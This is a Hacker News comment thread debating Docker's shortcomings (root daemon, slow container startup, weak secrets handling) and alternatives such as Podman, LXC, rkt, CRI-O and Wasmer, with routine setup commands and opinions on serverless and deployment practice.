aloknnikhil 5 years ago

> In fact, a global system daemon should not be needed. Either users should be able to run their own daemons or container management should avoid having a daemon at all, by storing container state in a shared database.

Absolutely love Podman. You can even configure registries so it works with Docker Hub easily.

https://podman.io

  • nikisweeting 5 years ago

    Yeah but no docker-compose support :/ dealbreaker for us. There's an alpha podman-compose project but we couldn't get it running.

    • likeclockwork 5 years ago

      You really don't need it, since podman has pods of containers that communicate with each other. You can export and play back the pods as Kubernetes YAML... but I just use a bash script plus an environment file to configure, create and launch pods. What else is docker-compose really doing for you?
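
      For example, a rough sketch (image names and ports are just illustrative):

          podman pod create --name web -p 8080:80
          podman run -d --pod web nginx
          podman run -d --pod web redis
          podman generate kube web > web.yaml
          podman play kube web.yaml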

      • nikisweeting 5 years ago

        Our entire company runs on like ~20 docker-compose files. It's a super elegant way to describe collections of containers without the management overhead of Kubernetes. We've had nothing but good experiences with compose, and lots of headaches with Docker swarm and K8s.

    • dharmab 5 years ago

      Both Podman and CRI-O support Pods, which can fill the same use case as docker-compose

      • nikisweeting 5 years ago

        Which require kubernetes, which requires a full-time team member just to manage. Docker-compose has been a lifesaver for low-complexity declarative service management on our self-hosted systems.

neckardt 5 years ago

I'm surprised nobody is mentioning LXC[1]. I'm by no means a containers expert, but they claim to be more secure since containers default to running as non-root. I had no trouble installing LXC with apt, while with Docker I often got an outdated version. I'm now using LXC for all of my basic container applications (self-hosting a wiki and a few other sites).

[1]: https://linuxcontainers.org/

  • dvfjsdhgfv 5 years ago

    Because LXC has no marketing money like Docker. For me it's just one of these cool tools I use every day without giving it a second thought.

    • jsilence 5 years ago

      How is the tooling compared to Docker? Genuinely interested. Are there platforms like Portainer available? Is something like docker-compose possible?

      • zaarn 5 years ago

        LXC is a bit simpler than that; the modus operandi is to unpack the rootfs of your favorite distro (e.g. Ubuntu, Alpine) into the container, and it runs /bin/init in that container. It essentially behaves like a full VM without the virtualization part.

        Tooling would be things like Ansible to set up the container as you would a normal Linux system. Though to be honest, not many people have invested in good tooling around LXC; it should be possible without problems to run a Docker rootfs in LXC.
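
        A minimal sketch with the classic lxc-* tools (distro/release names are just examples):

            lxc-create -n mybox -t download -- -d ubuntu -r bionic -a amd64
            lxc-start -n mybox
            lxc-attach -n mybox -- /bin/bash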

  • jeff_vader 5 years ago

    One reason it's not very popular (from my experience): Docker Desktop for Macs, which makes the Docker experience on macOS feel somewhat close to native. Meanwhile, to use LXC you'd have to work inside a VM (VirtualBox or similar). The last 3 companies I worked for (in London) were almost 100% macOS (which is a little sad).

    • MrBuddyCasino 5 years ago

      If you use "kind" to create a K8S cluster on MAC, using LXC is totally transparent. You can just load regular Docker images via "kind load docker-image". It even takes less RAM than minikube, because the running Docker VM is re-used.

  • dbleyl 5 years ago

    LXC is awesome; I'm wondering the same thing. It also has some niches in the Kubernetes space. I'm using LXC for development DBs and private servers.

  • FreeHugs 5 years ago

    How do you create an image for LXC?

    With docker, they have the docker.io service with all types of distros you can choose from.

    • rlpb 5 years ago

      The project provides prebuilt images for all the common distros: https://us.images.linuxcontainers.org/

      Use them in one command. For example:

          lxc launch images:debian/sid/amd64
      
      Ubuntu, which I believe is the most popular image base in Docker, ships official cloud images, and you can also use these in one command:

          lxc launch ubuntu:bionic

      • FreeHugs 5 years ago

        That sounds dangerous:

            All images available on this server are
            generated using community supported, upstream
            LXC image templates
        
        And:

            Note that the images found on this image server are
            unofficial images. Whenever possible, you should try
            to use official images from your Linux distribution
            of choice

        • rlpb 5 years ago

          That's no different from Docker's community images, is it? And as I pointed out, Ubuntu ships official images, which was demonstrated in my second command.

          • FreeHugs 5 years ago

            Don't know about Ubuntu because I use Debian.

            docker.io calls their Debian images "official" and says they are maintained by two Debian developers.

    • StreamBright 5 years ago

      You can use the following:

          lxc image import metadata.tar.gz rootfs.tar.gz --alias hello
      
      Not sure which part of the process you're referring to, though.

  • judge2020 5 years ago

    Docker isn't up to date in the official Ubuntu (and Debian?) repos for some odd reason. A better way is either snap (snapcraft) or adding Docker's own apt repository.
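
    Adding Docker's apt repo on Ubuntu looks roughly like this (per Docker's install docs; verify for your distro):

        curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -
        sudo add-apt-repository \
          "deb [arch=amd64] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable"
        sudo apt-get update && sudo apt-get install docker-ce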

    • FreeHugs 5 years ago

      Aren't those packages provided by Ubuntu and Debian? Then which versions are provided would not be under Docker's control.

      docker.io provides Debian 10 as far as I can tell.

    • e12e 5 years ago

      Docker (the daemon and tooling) is generally upstream-supplied (i.e. Docker provides apt repos, etc.).

      Not uncommon for a rapidly moving upstream. I wouldn't recommend running distro-supplied Docker in general (and neither does Docker).

      Curated apt repos are nicer than snaps, IMNHO.

    • fiatjaf 5 years ago

      snap never works.

  • aitchnyu 5 years ago

    How cross-platform are LXC containers? Somehow I still use Vagrant in my pet project, since I want Windows and Mac users to have a dev environment in a few steps.

KaiserPro 5 years ago

A few things that I would add to that list:

o No primitives to deal with secrets.

o Terrible disk handling (aufs was just horrid; overlay2 I think misses the point; devicemapper is just silly)

o poor speed when downloading and uncompressing images.

Of all of them, the most serious is the lack of secrets handling. Basically you have to use environment variables. Yes, you can use docker-compose and stuff appears, but that's only useful if you use compose/swarm.

In this day and age, to have secrets as a very distant afterthought is pretty unforgivable.
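
(For comparison, Swarm-mode secrets do exist and land in-container at /run/secrets/<name>; the image name below is a placeholder:

    echo -n "hunter2" | docker secret create db_password -
    docker service create --name app --secret db_password myimage

but that only helps if you've bought into swarm.)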

  • xorcist 5 years ago

    The most basic problem with Docker is the use of a daemon that is not init.

    Access control is at best problematic.

    Upgrading the daemon without losing state is tricky.

    Requiring daemon access to build images is insane.

    Building this functionality into something like systemd would be more robust but it's way harder to sell as a product.

    • Smithalicious 5 years ago

      Yeah Docker should get with the times and be assimilated into systemd like everything else

      • oblio 5 years ago

        You could argue about many things bundled with systemd, but since containers are just souped-up processes, this is actually a use case that makes sense for an init system.

        • CameronNemo 5 years ago

          I disagree. I would prefer a model where the supervisor needs no knowledge of the LSM profile, namespaces, seccomp profile, or cgroups applied to a service. Additionally, I would prefer a non-init service supervisor.

        • ahartmetz 5 years ago

          I see them as souped-down virtual machines or the new vServers but with a decent interface. vServers (a bunch of hacks to separate users as if running different Linux instances) were pretty awful.

    • ahartmetz 5 years ago

      Okay Lennart, if you say so.

  • antocv 5 years ago

    What do you consider a secret? What other system do you recommend which has the feature you want?

    I can't see how one would inject data into a process without ptracing/gdb-attaching to it and messing with its internal memory, or just using environment variables or the argument list. If you put it in a file somewhere, you still have to tell the process where the file is via an argument or env var, and also manage that "volume" and the uid space of that file and process.

    Kubernetes secrets have nothing to do with containers - they usually expose the secret as an env var or a volume and file anyway.

    • KaiserPro 5 years ago

      A secret is anything that you don't want to be public: normally API keys, or some other similar token.

      It's not even a case of stopping people attaching a debugger; there is simply no standard mechanism. Some sort of secret store should be a primitive in any container/VM/unikernel built since 2012.

      The "recommended" way is to map a volume in to a container. But thats rubbish, there is no standard place to put it, and crucially no API to fill the volume full of secrets. How do I map the specific volume to a container? you can't its manual.

      What would be nice is either a tagged value store, where you specify a tag when you build a container so you have a way to signal which secrets your container wants, or a lump of the container that you can encrypt that has a key-value store in it.

      There are lots of documents telling you that you _shouldn't_ embed secrets in your container, but there are not many howtos that don't involve the engineering equivalent of gaffer tape and wet string.

      Most of this has now been solved by better[] orchestration systems.

      [] not great though.

    • heyoni 5 years ago

      I smell potential for a fun tutorial with that last part!

  • paulddraper 5 years ago

    > the most serious is the lack of secrets handling. Basically you have to use environment variables.

    That's how I always handle my secrets. (12 factor app)
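
    e.g. (file name illustrative):

        docker run --env-file ./production.env myimage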

    Am I missing a better way?

    • fhgsfkcc 5 years ago

      Secrets don't belong in env vars, because many languages and/or frameworks will happily dump all your env vars to users in the event of misconfiguration or certain errors.

      • paulddraper 5 years ago

        I have literally never seen that happen. (Outside a core dump, which has a lot more than env vars.)

        You have any examples in mind?

        • ygjb 5 years ago

          It happens all the time, especially in security and quality assurance testing. It's less common in modern versions of tools and frameworks, but I routinely encounter these kinds of dumps when I am doing security testing work on anything enterprisey.

        • nikisweeting 5 years ago

          Django error pages with DEBUG=True.

nickjj 5 years ago

I've been using Docker since 2015ish and the container start up / stop speed is really the only thing that bugs me.

Everything else is fine for day to day usage IMO (on Windows and Linux at least) and very much worth the trade offs, but having to wait multiple seconds for your app to start is tedious since it plays such a heavy role in both development and even in production. Each second your app is not running is downtime, assuming you're not load balanced.

I opened an issue for this almost a year ago but not too much has come from it other than identifying there was maybe a regression in recent'ish versions: https://github.com/moby/moby/issues/38077

We're talking multiple seconds in Docker vs ~150ms as a regular process to start up a typical web app process like gunicorn in a decently sized Flask app (many thousands of lines of code, lots of dependencies -- a real world app).
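
The overhead is easy to measure yourself (any small image works; alpine assumed pulled):

    time /bin/true
    time docker run --rm alpine /bin/true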

  • james_s_tayler 5 years ago

    I take it you've never worked in an enterprise Java shop with a few-million-line legacy code base deployed to whatever the hell webserver I can't remember the name of right now.

    Seconds is great in comparison. Minutes, not so much.

    • cs02rm0 5 years ago

      JBoss, Websphere? I know that pain, hadn't even occurred to me that anyone would think containers had a slow startup time. Especially as they've often replaced VMs for me.

      • james_s_tayler 5 years ago

        WebLogic.

        • tuananh 5 years ago

          this name brings back lots of painful memories from back in the day.

  • TheWizardofOdds 5 years ago

    The long startup time is somehow what keeps me from really liking Docker. In the end (if I understood correctly), it is supposed to be the go-to tool for serverless architecture. If my serverless function needs more than a second to start up, it's not usable for me.

    Even the hello-world container, which is only a few kB in size, needs roughly a second to start up.

    • _hao 5 years ago

      I'm working on a web service that takes 4-5 minutes to start up because of all the shit it has to warm up. I'd be happy if it took even a minute, IF I could port it to a newer tech stack and containerize it.

    • utopian3 5 years ago

      > In the end (if I understood correctly), it is supposed to be the go-to tool for serverless architecture.

      You misunderstood. No one calls Docker a “serverless” architecture.

      • TheWizardofOdds 5 years ago

        And I didn't either; I called it a tool for serverless architecture. In fact some tools for serverless architecture, like AWS Fargate, require you to use Docker.

        • VonGallifrey 5 years ago

          I know that AWS Fargate has the tagline of "Run containers without managing servers or clusters", but that is not what "serverless architecture" means. Fargate is a container service.

          Serverless would be, for example, AWS Lambda, Azure Functions or Google Cloud Functions.

          • onefuncman 5 years ago

            Fargate is serverless because the compute is abstracted away completely. A lambda runtime is just a specialized container and they've added similar customizability to it lately with Layers/Runtime configuration.

            • VonGallifrey 5 years ago

              I know that the definitions of these kinds of buzzwords can be fuzzy sometimes, but I have never heard a definition of serverless that would include Fargate.

              Here is what Cloudflare uses to describe serverless:

              > Serverless computing is a method of providing backend services on an as-used basis. Servers are still used, but a company that gets backend services from a serverless vendor is charged based on usage, not a fixed amount of bandwidth or number of servers.

              With Fargate you still get charged for the instances your containers are running on, even if the containers themselves are idle. This is a container service and not a serverless architecture.

              • chatmasta 5 years ago

                How do you come to this conclusion from this pricing page? [0]

                I might be missing something but that seems like serverless pricing. You might be thinking of the pricing scheme when Fargate first launched? Or maybe you’re thinking of ECS, which does in fact charge as you described.

                [0] https://aws.amazon.com/fargate/pricing/

                • VonGallifrey 5 years ago

                  Everything I am reading there screams container service and not serverless. Some Quotes:

                  > You pay for the amount of vCPU and memory resources consumed by your containerized applications.

                  How does vCPU fit into serverless architecture?

                  > Pricing is based on requested vCPU and memory resources for the Task.

                  Tasks being a collection of Containers. This is simply a container service like ECS or EKS.

                  > Pricing is calculated based on the vCPU and memory resources used from the time you start to download your container image (docker pull) until the Amazon ECS Task terminates.

                  This means you pay for the resources that were started for your containers until the container ends. Including all idle time and any overprovisioning you did because you have to tell it which instance type you want. Compare that to the pricing of Lambda where you only pay for the time your functions need to execute when they get called based on external events.

                  To bring this back to the beginning of the discussion: Complaining about docker because it is not a good tool for serverless architectures is not smart because it is not used in serverless architecture offerings. Fargate uses containers but it is not a serverless service. Fargate is a container service that tries to simplify setup of compute clusters in comparison to ECS, EKS and EC2.

  • hbt 5 years ago

    - start the container with docker run and run sleep 999

    - then start your application with docker exec

    you will have instant execution.

    Only restart your container if the environment changes (new build etc.)

    For development, mount your source code in readonly.
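
    Roughly (image and app names are placeholders):

        docker run -d --name dev -v "$PWD":/app:ro myimage sleep 999
        docker exec -it dev gunicorn app:app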

  • croo 5 years ago

    A few seconds would be a dream come true. Try working on an application where every deploy is a coffee break... :(

    • xorcist 5 years ago

      Starting the process probably isn't what's taking so long though.

      • oblio 5 years ago

        You'd be surprised. Big Java enterprise apps deployed to Tomcat or, God forbid, IBM/Oracle app servers can take 2-5 minutes just to be fully operational. I've had deployment health checkers time out after 2 minutes because the servers just wouldn't be up. It seems insane, but that's how life looks for thousands of developers.

        • nickjj 5 years ago

          > It seems insane, but that's how life looks for thousands of developers.

          True, but there are tens of thousands of developers not using big Java enterprise apps, for whom Docker adding 4-6+ seconds of startup time has a huge negative impact.

          gunicorn (Python) apps tend to start in hundreds of milliseconds (even pretty big ones).

          puma (Ruby) apps tend to start in seconds or tens of seconds (it can get higher for massive apps).

          cowboy (Elixir) apps tend to start in low seconds (this includes booting up the BEAM VM).

          Just the above 3 examples cover the Flask, Django, Rails and Phoenix ecosystem. That's a lot of developers.

          • oblio 5 years ago

            I've been part of Ruby teams, and Rails apps can start almost as slowly as Java apps. Big .NET projects, too.

            Plus there are probably 10x more Java developers than Ruby developers out there. And Elixir/Phoenix devs are probably 0.001% of Java devs :-)

            • nickjj 5 years ago

              It depends on how big the Rails app is.

              One app I work with has 40 top-level gems and about 17,000 lines of Ruby code (which goes a long way in Rails). It's not "big big" but it's not tiny. It takes under 10s to boot up. I'm sure if you have a Shopify-tier app it takes much longer, but a majority of apps aren't at that scale.

              I was just throwing out examples, and I'm trying to say that not everyone is in a situation where Docker's added 2-5+ seconds is no big deal. For a Flask app those few seconds make it ~20-50x longer to start up due to Docker, and for a majority of other frameworks / average app sizes, it's a non-ignorable amount.

chucky_z 5 years ago

I am currently on this train.

Having used rkt in the past, I went to revisit it recently only to find this: https://www.cncf.io/blog/2019/08/16/cncf-archives-the-rkt-pr...

I am so extremely disappointed in the CNCF as rkt (at the time, at least) seemed to be more "production ready" than Docker.

Are there any real alternatives? Is the answer "find something else that uses containerd in a more friendly way?" Is the answer "try to use podman/buildah, which are weird in their own way?"

  • roca 5 years ago

    Podman looks interesting at a quick glance, though not supporting docker-compose makes migrating nontrivial for us.

    • devmunchies 5 years ago

      and my attempts to get it running on a Mac were fruitless. I would have to do it in a Vagrant VM, like 5 years ago.

  • angry_octet 5 years ago

    Wasn't that because RedHat bought CoreOS, and RH is all k8s? And then no one was pushing rkt along with commercial support, so it died?

    Agree that rkt was cool. I just don't know if RH is becoming more like MSFT or more like Oracle.

  • l_t 5 years ago

    Maybe containerd [0] is an alternative? It's being used in k3s instead of Docker.

    [0]: https://containerd.io/

    edit: I didn't notice that you mentioned this in your comment, my bad. Can you explain why it doesn't work for you? I'm new to the Docker-alternative scene and thought it looked pretty good at first glance.

  • dharmab 5 years ago

    We're implementing CRI-O so we can use Docker and Kata Containers side by side for different workloads. We're hoping if things go well we can fully migrate off Docker after a few years of transition, but it's in early stages.

ses1984 5 years ago

There are two kinds of software: software no one uses, and software people complain about.

  • notyourday 5 years ago

    There's also software that was created to solve a specific problem that got misappropriated to do something else

    There used to be an ISP called pilot.net. It was a crappy ISP but to solve its ISP billing problem it wrote a billing system for telcos.

    There was a company that tried competing with AWS selling hosting based on hyperthreads of CPUs. It wrote its own provisioning system because it did not want to pay for Virtuozzo. The company's name used to be dotCloud.

    • otabdeveloper4 5 years ago

      > There's also software that was created to solve a specific problem that got misappropriated to do something else

      Docker is a classic case. Docker must be the craziest, most over-engineered solution for packaging developer artifacts in the Universe.

      • majewsky 5 years ago

        In the same way that Dropbox is the most over-engineered solution for file sharing, when all you need is an SVN-backed directory with curltmpfs. ;)

    • oblio 5 years ago

      What's the link between pilot.net and dotCloud? Did dotCloud use the billing system from pilot.net?

  • Kaiyou 5 years ago

    Also feature-complete software that is regularly used by lots of people, but nobody complains about, because devs don't mess with it anymore. Think ls, grep, yes, ...

    • ses1984 5 years ago

      I will happily complain about grep. My complaints might not be valid but I'll happily do it. I hate that bsd and gnu grep are different. I can never remember when and which flag I need to pass when my expression has stuff in it the default can't handle. I don't like that it's slower than alternatives like ag. I wish it would automatically handle compressed data.

      Also the saying is not as pithy if you add more kinds of software.

    • oblio 5 years ago

      Devs can't mess with it anymore, you mean? There are a myriad of alternatives to ls, grep, etc. Dunno about alternatives to yes, maybe there's a si/oui/da out there? :)

      Sometimes the alternatives are considered superior to the originals (ripgrep), but the originals are just fossilized in place. In 2019 I don't even think we'd be able to make less the pager instead of more, because we're so conservative about universal defaults; it's sad.

      • Kaiyou 5 years ago

        Well, sure. There are alternatives, but the original software stands as it is and is available out of the box. It's really useful to learn once and then use everywhere.

  • james_s_tayler 5 years ago

    Why have I not heard this before?

    Brilliant.

    I'm going to file this right alongside "software is never finished, only abandoned"

    • ses1984 5 years ago

      I don't know if I would call it brilliant, it's pretty funny though. I didn't make it up.

      Your quote was first said about art and is attributed to Da Vinci.

  • e_proxus 5 years ago

    There's also the almost never used software that people complain about being forced to use.

bob1029 5 years ago

What's wrong with booting a VM off a standardized base image (e.g. an AMI), and then applying simple deployment scripts for each application you need to run? You could probably replicate 90% of the justification for using docker with some basic scripting.

  git clone https://github.com/myprofile/my-cool-app
  cd my-cool-app
  chmod +x deploy.sh
  ./deploy.sh
That's it. The above script would be responsible for getting your application runtime environment up and then getting the application running as a persistent service with reasonable defaults. Most cloud vendors let you put something like that in your VM startup configuration.

All you would need from this point is to ensure that any desired management functions are built into the app itself. Perhaps having a central management service it communicates with across the public internet would be a good place to start. You don't need a lot of tooling to make a huge impact here.

If you own the codebase behind it, and have a fundamental understanding of your deployment techniques, you can easily pivot and embrace radical new approaches. If you are stuck on Docker, that pivot doesn't look as easy from where I am standing.
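
A minimal sketch of such a deploy.sh (package names, paths, and the service unit are purely illustrative):

  #!/bin/sh
  set -e
  # install the runtime
  apt-get update && apt-get install -y python3 python3-venv
  # set up an isolated environment for the app
  python3 -m venv /opt/my-cool-app
  /opt/my-cool-app/bin/pip install -r requirements.txt
  # register and start the app as a persistent service (unit file assumed present in the repo)
  cp my-cool-app.service /etc/systemd/system/
  systemctl daemon-reload
  systemctl enable --now my-cool-app
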
  • jordanthoms 5 years ago

    That approach works, but if you are going to go into production with it you might need to support:

    - Rollbacks

    - Automatic deployment of new releases from CI, rolling releases

    - Healthchecks, detecting if/when the server exits and making sure that VM gets killed

    - Canary deployments

    - Autoscaling (could use an autoscaling instance group for it, but what if you need to scale based on other metrics)

    - Log aggregation

    - Monitoring

    - Service discovery, load balancing between services

    - Service mesh

    - Fast startup of instances (starting a fresh VM and waiting for it to setup everything from scratch could take ~3-4 minutes, docker is in the ~30s or less range).

    - Bin-packing (run a high-cpu low-memory workload colocated with a low-cpu high-memory workload for maximum efficiency)

    etc, etc, all of which you get either out of the box or without a huge amount of work if you adopt something like Google Kubernetes Engine (which takes a few clicks to spin up a cluster).

    If you don't need any of that stuff and don't want to learn Kubernetes, it's totally justifiable to go that way, but personally I would take Google Kubernetes Engine over something like that any time. There's some up-front cost learning how it works which then pays off very quickly.

    • KaiserPro 5 years ago

      None of these features are a function of Docker; they are a function of the orchestration layer.

      Bin-packing isn't what you describe; it's shoving as much stuff onto a machine as possible. Proper resource dependency management allows what you describe, something k8s is weak on compared to other orchestration systems.

    • ay 5 years ago

      What about HashiCorp's Nomad? In my experience it does pretty much all of the above at a fraction of the complexity...

  • spookthesunset 5 years ago

    Okay so write your own crappy (excuse me, graceful and elegant) pile of shell scripts that nobody in your company but you understands? Sounds good to me.

    The second you leave, somebody is gonna rip that crap out and replace it with docker. All while mumbling under their breath...

    • james_s_tayler 5 years ago

      This. Times 100. This is one of Docker's biggest value adds.

    • eeZah7Ux 5 years ago

      Nonsense. Applications have a lot of complexity and therefore code around initialization. Adding a little script to deploy them is harmless.

      It's also the approach used by various FAANGs operating at a large scale.

  • roca 5 years ago

    Off the top of my head, two things in our (OP) case: 1) memory overhead, 2) slow access to filesystem storage shared between containers.

  • lacampbell 5 years ago

    This is what I ended up doing. Don't laugh, but I spent about two weekends furiously learning docker for a side project, only to replace it with a shell script of about 100 lines.

    I'm sure containers have valid use cases for larger teams, but for one person I didn't see the point at all - especially as I use the same OS for dev and production.

    • samvher 5 years ago

      Docker is not only about having reproducible environments. I mostly work as a single developer and I use Docker all the time, mainly because I like the isolation properties and because it's super easy to launch certain services (e.g. set up a Postgres database). In the past I would really often have issues with conflicting dependencies; that's all gone now. The fact that your shell script did the job for you is obviously a good thing, but maybe that just means that in this particular situation Docker didn't have much to offer you.

    • james_s_tayler 5 years ago

      I use docker all the time when doing side projects by myself. It's nice because I don't know ahead of time what the dependencies will be but I don't really care. I just pull in all the container images via docker compose and suddenly everything is there and talking to each other.

      I find it very ergonomic, aside from the need to run docker system prune from time to time.

      I also value it highly when some open source project I want to play with has docker compose in its readme. Super easy just to spin it up.

  • dharmab 5 years ago

    Low efficiency. When you work with 1000s of cores, a VM per app instance is literally millions of dollars annually in wasted CPU compared to using a container orchestrator.

  • techntoke 5 years ago

    This is way slower than Docker. Rootless containers are already a thing. If you still want VMs then see Kata Containers. Containers have a lot of benefits, the major one for me is reproducibility and application sandboxing. There is a reason containers exist and that every large cloud platform has adopted them, including Microsoft adding support in Windows.

    • notyourday 5 years ago

      > This is way slower than Docker.

          add-job bake-instances --app=my-id --instances=200

      Oh, you never wrote tooling and you don't have a jobbing engine? Well, that's like complaining that you can't get an Uber because you did not download the app. It is sort of funny, because every single shop that is "oh, containers!" either creates them manually (slowly and painfully) or just uses random ones developers find.

      > There is a reason containers exist and that every large cloud platform has adopted them, including Microsoft adding support in Windows.

      It is the same reason why Whole Foods sells sushi: that's the way to sell salmon for $85/lb to hipsters. Hipsters hate buying salmon for $22/lb but they love the rolls.

      • techntoke 5 years ago

        > Oh, you never wrote tooling and you don't have a jobbing engine? Well, that's like complaining that you can't get an Uber because you did not download the app. It is sort of funny, because every single shop that is "oh, containers!" either creates them manually (slowly and painfully) or just uses random ones developers find.

        Whatever helps you sleep at night. Creating a container image doesn't have to be slow. There are a lot of tools to help with this that provide things like caching. If I find a container image, the first thing I do is look at the Dockerfile to see if it follows best practices, and if it is secure and lightweight. A lot of the official images on Docker Hub are pretty good. Creating a VM image is going to be slower than building a Docker image, period.

        > It is the same reason why Whole Foods sells sushi: that's teh way to sell salmon for $85/lb to hipsters. Hipsters hate buying salmon for $22/lb but they love the rolls.

        I don't know what this has to do with anything. Besides, I thought hipsters would be vegan.

zests 5 years ago

I'm newer to the Docker scene but haven't really found any of the complaints in this article realized in my work. Faster speed would be nice but I don't really mind it now.

I see a lot of complaints about the docker daemon and root privileges on HN and I've tried to understand where they are coming from but I can't get anywhere. For instance, I understand the reasoning behind "if there is no need for a daemon there shouldn't be a daemon" but I don't really understand what the actual/realized/tangible benefits of not having a daemon would be.

  • roca 5 years ago

    We have observed the daemon getting into a bad state and no longer responding to container-create requests, wedging our production system. I guess this kind of bug could happen with a non-daemon approach if there's shared state, but it seems less likely.

    Not using any components with root privileges obviously makes things more secure.

    Another benefit of not requiring a daemon or privileges is that then it should be easy to manage fully independent sets of containers. In particular a container should be able to manage its own nested containers in a straightforward way. This is painful in Docker.

  • lmeyerov 5 years ago

    We hit security concerns here in two directions:

    -- When our software gets deployed on-prem by our users (or in their cloud, or wherever), our customers would rather not deploy it with root for no good reason. Some of them have to do things like fill out forms ahead of time, or on use, due to this (!).

    -- In turn, when we run third-party code, say as a normal dependency or a user-submitted script, we have no reason to trust it. That means we want to limit what it can do, and especially, if something breaks out, have defensive layers. (Browsers & NodeJS are Technology From The Future in this regard.)

    Note that almost all "docker exploit X FUD" articles, in fine print, make assumptions around running docker as root / privileged / etc. It's 2019, we know better.

    Also, we happen to run an increasing amount of our stack as GPU code, which adds a (not so) funny layer to all this.

    • james_s_tayler 5 years ago

      I didn't consider the on-prem use case, but I can see how that could become an issue.

  • wokwokwok 5 years ago

    It would be faster.

    I also don't really care if a container takes 2 seconds or 100ms to start... but building docker images is painfully slow.

    I've also ended up (numerous times) with the "docker daemon is borked" situation, which requires a restart to fix... and you can imagine how that sucks on prod or multi-tenant systems.

    • roca 5 years ago

      One reason we care about containers taking seconds to start is that our CI tests have to start and stop a lot of containers, and it all adds up. And running them in parallel wouldn't help because they would just bottleneck on the global docker daemon... or break entirely by interfering with each other, unless we run multiple Docker-in-Docker setups, which would be even more painful and add its own overhead.

    • krferriter 5 years ago

      I've also run into the daemon crashing on production systems and taking down all of the other containers on that host. I end up just killing the host and restarting the jobs on a newly provisioned one. There's a lot of overhead. If they could get it to run without requiring a persistent (and root) shared daemon that would be a big improvement.

    • shaklee3 5 years ago

      I think a lot of this depends on how you set up the context in your build. I've seen a lot of people just set the context to a specific directory with no ignores. The docker daemon by default tars up the entire context directory, which can be multiple GB. However, as you point out, even if you fix that problem, for some reason many of the stages take a very long time, even if they are just copying a small text file.
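
      A .dockerignore at the root of the build context helps a lot here, e.g.:

          .git
          node_modules
          *.log
          build/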

syrusakbary 5 years ago

The article is completely on point. Because of all the reasons laid out there (and a few more) I started Wasmer, a new container system based on WebAssembly - https://wasmer.io/

Here are some advantages of Wasmer vs Docker:

* Much faster startup time

* Smaller containers

* OS independent containers (they can run in Linux, macOS and Windows)

* Chipset independent containers (so they can run anywhere: x86_64, Aarch64/ARM, RISC-V)

  • gravypod 5 years ago

    Is there a feature-by-feature comparison of Wasmer to Docker? I don't think Wasmer, while interesting, is a container system. It looks more like a bytecode VM.

    Things I use and love from docker that to me feel "container"-y:

    1. OSs as a library (FROM alpine:3.9)

    2. Network namespaces so all applications think they are running on a machine with port 80 available

    3. Service discovery through DNS

    4. CPU and memory share allocation

    5. Volumes (bind, temporary, remote)

    6. docker-compose for single-command & single-tool development environments (all you need is docker and an internet connection)

    • syrusakbary 5 years ago

      Wasmer is an application-based container, while Docker is an OS-based container.

      Because of that, some of the things that you posted are a bit hard to compare.

      We believe that by having a VM (based on an industry-adopted specification such as WebAssembly) we can control much more granularly both execution (CPU, memory) and the runtime interoperability with the system (networking, file system, ...), solving most of the issues that Docker containers have.

      • gravypod 5 years ago

        I don't think we're using container system similarly. I'm using the term "Container" in the way Docker describes:

        >A container is a standard unit of software that packages up code and all its dependencies so the application runs quickly and reliably from one computing environment to another. A Docker container image is a lightweight, standalone, executable package of software that includes everything needed to run an application: code, runtime, system tools, system libraries and settings.[0]

        If you cannot package system tooling, system libraries, and configuration with your software, I don't think what you're building is a container system. And if you lose the sorcery of Docker's network namespaces and volume drivers, you're losing a lot of functionality that Docker provides.

        I wouldn't call the JVM, RVM, V8/SpiderMonkey, cPython, and any other language VM a "container system" even though many of them allow you to set up platform isolation, restriction, and sandboxing.

        I use "container" to reference a technology that allows me to build, package, ship, and orchestrate the execution of these units.

        [0] - https://www.docker.com/resources/what-container

      • jonahbenton 5 years ago

        With all respect- Docker packages a known code stack in a box. WASM creates a whole new code stack.

        Docker, with all its problems, solves a huge problem for the enterprise. WASM, cool as it is, creates a new one.

        I would love to see a WASM + unikernel builder, and some lightweight node scheduler that could plug into kubernetes, so you could run thousands of WASM packages on a node within a k8s cluster, rather than 10s of containers. That increase in leverage would justify the new code stack risk.

      • ahnick 5 years ago

        What's the selling point of Wasmer over the JVM or BEAM?

        • syrusakbary 5 years ago

          JVM requires almost all your stack to be rewritten for it.

          Because WebAssembly permits languages to be usable on the web, almost every other language (C, C++, Rust, Go and even Java) is now working on compiling to WebAssembly.

          Therefore you don’t need to adapt your stack to run it in Wasmer :)

          • gravypod 5 years ago

            > "JVM requires almost all your stack to be rewritten for it."

            This applies no more to the JVM than to Wasmer. There exists WASM to JVM bytecode transpilers [0].

            [0] - https://github.com/cretz/asmble

            • syrusakbary 5 years ago

              Although your point is completely right, once your application is in wasm you can perhaps use a wasm VM (Wasmer) directly, instead of another transpiler plus the JVM :)

  • roca 5 years ago

    Wasmer looks cool but FWIW it wouldn't address our (OP) needs. For one thing, in our containers we dynamically generate x86 machine code and execute it (yes, it has to be x86). Our needs are a bit special of course.

  • anaphor 5 years ago

    One thing I also find sorely lacking in Docker is the ability to run your containers with the appropriate seccomp privileges (in order to enforce Principle of Least Authority). I know this is possible with Docker, but it's not really done much in practice because of various difficulties. I wonder how difficult it would be to do that with your tool?
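
    (For reference, the Docker side is something like:

        docker run --security-opt seccomp=/path/to/profile.json myimage

    the hard part is authoring and maintaining profile.json, not passing the flag.)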

    • syrusakbary 5 years ago

      Since Wasmer is in control of all the syscalls, it's actually quite easy to manage the privileges in a more fine-grained way (think CloudABI permissions on top of your containers).

      • anaphor 5 years ago

        That sounds really interesting. I'm going to check it out. Thanks for working on this!

    • nwmcsween 5 years ago

      Seccomp is a horrible security model for containers: if the application or its libraries use differing syscalls, the seccomp ruleset is invalid.

      • pbar 5 years ago

        A process making a system call to the kernel functions the same way regardless of whether it is in a container or not. How exactly does the security model differ at all?

        • nwmcsween 5 years ago

          Because 99.9% of software doesn't make use of direct syscalls, instead it uses wrappers or standard functions that wrap various other syscalls that can and will change over time. Meaning $app_container v0.1 can and probably will have a different seccomp filter than $app_container v0.2

          • pbar 5 years ago

            This is the same case regardless of being in a container or not, $app v0.1 and $app v0.2 will have different filters

            • nwmcsween 5 years ago

              Of course it will, but Docker et al. attach filters to containers vs. attaching them to a specific binary, which is much easier (although still broken).

  • techntoke 5 years ago

    Some things to note:

    - Wasmer isn't available as a package on most distros from what I can tell. Instead they want you to curl a script directly to your shell, which is bad practice.

    - They do not have a reproducible benchmark or a test suite to prove that it is actually faster than Docker and it is likely you can't even compare them. The Docker daemon and containers generally have very fast startup times.

